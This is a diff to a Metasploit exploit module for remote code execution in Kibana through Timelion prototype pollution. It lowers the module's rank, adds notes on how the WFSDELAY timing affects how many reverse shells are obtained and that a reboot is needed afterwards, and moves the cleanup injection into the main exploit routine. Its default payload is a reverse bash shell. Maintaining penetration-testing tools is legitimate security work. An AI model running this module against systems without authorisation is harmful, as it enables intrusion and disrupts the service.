diff --git a/modules/exploits/linux/http/kibana_timelion_prototype_pollution_rce.rb b/modules/exploits/linux/http/kibana_timelion_prototype_pollution_rce.rb index 0df2a18e94aa..2c3a4e7f057d 100644 --- a/modules/exploits/linux/http/kibana_timelion_prototype_pollution_rce.rb +++ b/modules/exploits/linux/http/kibana_timelion_prototype_pollution_rce.rb @@ -4,7 +4,7 @@ ## class MetasploitModule < Msf::Exploit::Remote - Rank = GoodRanking + Rank = ManualRanking include Msf::Exploit::Remote::HttpClient prepend Exploit::Remote::AutoCheck @@ -19,7 +19,13 @@ def initialize(info = {}) javascript code. This leads to an arbitrary command execution with permissions of the Kibana process on the host system. - Tested against kibana 6.5.4, yielding between 43-53 shells. + Exploitation will require a service or system reboot to restore normal operation. + + The WFSDELAY parameter is crucial for this exploit. Setting it too high will cause MANY shells + (50-100+), while setting it too low will cause no shells to be obtained. WFSDELAY of 10 for a + docker image caused 6 shells. + + Tested against kibana 6.5.4. }, 'License' => MSF_LICENSE, 'Author' => [ @@ -42,7 +48,7 @@ def initialize(info = {}) 'DefaultTarget' => 0, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash', - 'WfsDelay' => 60 # can take a minute to run + 'WfsDelay' => 10 # can take a minute to run }, 'Notes' => { # the webserver doesn't die, but certain requests no longer respond before a timeout @@ -171,14 +177,9 @@ def exploit print_status('Trigginger payload execution via canvas socket') trigger_socket print_status('Waiting for shells') - rescue ::Rex::ConnectionError - fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") - end - - def cleanup + Rex.sleep(datastore['WFSDELAY'] / 10) print_status('Unsetting to stop raining shells from a lacerated kibana') send_injection(reset: true) trigger_socket - super end end